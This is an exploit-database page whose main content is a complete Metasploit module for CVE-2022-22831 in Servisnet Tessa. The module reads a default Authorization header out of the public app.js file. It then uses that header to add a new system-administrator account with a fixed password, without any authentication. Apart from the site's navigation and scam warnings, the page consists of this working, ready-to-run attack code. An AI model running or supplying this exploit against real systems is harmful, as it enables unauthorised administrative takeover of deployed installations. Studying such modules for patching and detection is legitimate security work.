0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Servisnet Tessa - Add sysAdmin User (Unauthenticated) Exploit
[##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',
'Description' => %q(
This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.
The app.js is publicly available which acts as the backend of the application.
By exposing a default value for the "Authorization" HTTP header,
it is possible to make unauthenticated requests to some areas of the application.
Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
A new admin user can be added to the database with this header obtained in the source code.
),
'References' =>
[
[ 'CVE', 'CVE-2022-22831' ],
[ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],
[ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
],
'Author' =>
[
'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Dec 22 2021",
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
}
))
register_options([
OptString.new('TARGETURI', [true, 'Base path for application', '/'])
])
end
# split strings to salt
def split(data, string_to_split)
word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
string = word.split('"]').join('').split('["').join('')
return string
end
# for Origin and Referer headers
def app_path
res = send_request_cgi({
# default.a.get( check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /baseURL/
data = res.body
#word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0]
print_status("baseURL: #{base_url}")
return base_url
else
fail_with(Failure::NotVulnerable, 'baseURL not found!')
end
end
def add_user
token = auth_bypass
newuser = Rex::Text.rand_text_alpha_lower(8)
id = Rex::Text.rand_text_numeric(4)
# encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111
json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'
res = send_request_cgi(
{
'method' => 'POST',
'ctype' => 'application/json',
'uri' => normalize_uri(target_uri.path, app_path, 'users'),
'headers' =>
{
'Authorization' => token
},
'data' => json_data
})
if res && res.code == 200 && res.body =~ /localhost/
print_good("The sysAdmin authorized user has been successfully added.")
print_status("Username: #{newuser}")
print_status("Password: 1111111111")
else
fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')
end
end
def auth_bypass
res = send_request_cgi({
# default.a.defaults.headers.post["Authorization"] check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
token = split(res.body, 'Authorization')
print_status("Authorization: #{token}")
return token
else
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
end
def check
if auth_bypass =~ /Basic/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def run
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
add_user
end
end
# 0day.today [2024-11-15] #